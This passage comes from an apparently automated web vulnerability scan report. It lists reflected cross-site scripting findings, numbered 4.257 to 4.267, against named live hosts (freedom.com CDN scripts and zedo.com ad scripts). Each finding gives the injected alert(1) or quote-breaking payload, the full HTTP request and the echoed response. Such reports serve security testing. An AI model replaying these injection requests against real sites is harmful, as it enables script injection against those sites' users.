<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?2ba1c"><script>alert(1)</script>0fdede783fa=1" />
...[SNIP]...

4.257. http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://common.cdn.onset.freedom.com
Path:	/common/tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 8e802<script>alert(1)</script>af386fa2d18 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?js=8e802<script>alert(1)</script>af386fa2d18 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:25 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 05:25:25 GMT
ETag: "00a3ec14ebd9f96044f83e5dfc16d618-109"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 05:25:25 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 109
Connection: close
Content-Type: text/javascript

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=8e802<script>alert(1)</script>af386fa2d18 */

4.258. http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://common.cdn.onset.freedom.com
Path:	/common/tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload fda89*/alert(1)//e73e572f888 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartadsfda89*/alert(1)//e73e572f888 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:26 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 05:25:26 GMT
ETag: "8a178484d3c6868d439736284bcc5571-559"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 05:25:26 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 559
Connection: close
Content-Type: text/javascript

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartadsfda89*/alert(1)//e73e572f888 */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }

function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos ==
...[SNIP]...

4.259. http://common.cdn.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://common.cdn.onset.freedom.com
Path:	/common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 5b511*/alert(1)//685b93a954a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartads&5b511*/alert(1)//685b93a954a=1 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:30 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 05:25:32 GMT
ETag: "e234251c50093aaa4ccfc19dd9d0ec18-19869"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 05:25:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/javascript
Content-Length: 19869

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads&5b511*/alert(1)//685b93a954a=1 */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }

function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos
...[SNIP]...

4.260. http://common.onset.freedom.com/common/tools/load.php [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/common/tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>2971a6c9080 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?js=da001<script>alert(1)</script>2971a6c9080 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:24 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n36), ms iad-agg-n36 ( sfo-agg-n40), ms sfo-agg-n40 ( origin)
ETag: "64016ad15df0065368a6076b7710a50f-109"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:59:25 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Sat, 29 Jan 2011 01:59:25 GMT
Connection: keep-alive
Content-Length: 109

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=da001<script>alert(1)</script>2971a6c9080 */

4.261. http://common.onset.freedom.com/common/tools/load.php [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/common/tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload c74d3*/alert(1)//5adca407e2b was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartadsc74d3*/alert(1)//5adca407e2b HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:28 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n22), ms iad-agg-n22 ( sfo-agg-n18), ms sfo-agg-n18 ( origin)
ETag: "0b4514c6e4844bf90b5c34cdfa6ee0ea-559"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:59:28 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Sat, 29 Jan 2011 01:59:28 GMT
Connection: keep-alive
Content-Length: 559

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartadsc74d3*/alert(1)//5adca407e2b */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }

function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos ==
...[SNIP]...

4.262. http://common.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 7ef4d*/alert(1)//802d53a8b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /common/tools/load.php?js=common_fi_oas,common_dartads&7ef4d*/alert(1)//802d53a8b73=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:42 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n30), ms iad-agg-n30 ( sfo-agg-n43), ms sfo-agg-n43 ( origin)
ETag: "c700a66bce50da8b94779fc293894c44-19869"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:59:42 GMT
Age: 1
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Sat, 29 Jan 2011 01:59:43 GMT
Connection: keep-alive
Content-Length: 19869

/* http://common.cdn.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads&7ef4d*/alert(1)//802d53a8b73=1 */
function getLast(s, num)
   {
   return s.substr(s.length - num, num);
   }

function approveAd(tagpos)
   {
   var last = getLast(location.href, 7);

   if(last.toLowerCase() == "?google")
       {
       if(tagpos
...[SNIP]...

4.263. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 10] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5bfe"%3b8c2adbfec8b was submitted in the REST URL parameter 10. This input was echoed as d5bfe";8c2adbfec8b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002/0/951d5bfe"%3b8c2adbfec8b/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884312773
Cache-Control: max-age=2591981
Expires: Mon, 28 Feb 2011 01:59:12 GMT
Date: Sat, 29 Jan 2011 01:59:31 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
ar zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0;n=951d5bfe";8c2adbfec8b;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 = (zzAg.inde
...[SNIP]...

4.264. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 11] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fce7"%3bcb35ad0aec6 was submitted in the REST URL parameter 11. This input was echoed as 1fce7";cb35ad0aec6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002/0/951/21fce7"%3bcb35ad0aec6//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859793634
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:32 GMT
Date: Sat, 29 Jan 2011 01:59:32 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
zIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0;n=951;s=21fce7";cb35ad0aec6;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 = (zzAg.indexOf(
...[SNIP]...

4.265. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c895"%3bbb06c60bd90 was submitted in the REST URL parameter 4. This input was echoed as 8c895";bb06c60bd90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/38698c895"%3bbb06c60bd90/172/0/951000002/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884309949
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:24 GMT
Date: Sat, 29 Jan 2011 01:59:24 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=38698c895";bb06c60bd90;g=172,0;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netsca
...[SNIP]...

4.266. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4c8"%3b53e86ebadaa was submitted in the REST URL parameter 5. This input was echoed as 2e4c8";53e86ebadaa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/1722e4c8"%3b53e86ebadaa/0/951000002/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2884310509
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:25 GMT
Date: Sat, 29 Jan 2011 01:59:25 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
ined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=1722e4c8";53e86ebadaa,0;c=951000002,951000002;i=0;n=951;s=2;" + zzStr;

function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.
...[SNIP]...

4.267. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://d3.zedo.com
Path:	//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8af"%3b54ceb3db781 was submitted in the REST URL parameter 6. This input was echoed as fe8af";54ceb3db781 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/602889/3869/172/0fe8af"%3b54ceb3db781/951000002/951000002/0/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859791972
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:27 GMT
Date: Sat, 29 Jan 2011 01:59:27 GMT
Connection: close
Content-Length: 4711

var zzDate = new Date();
var zzWindow;
var zzURL;
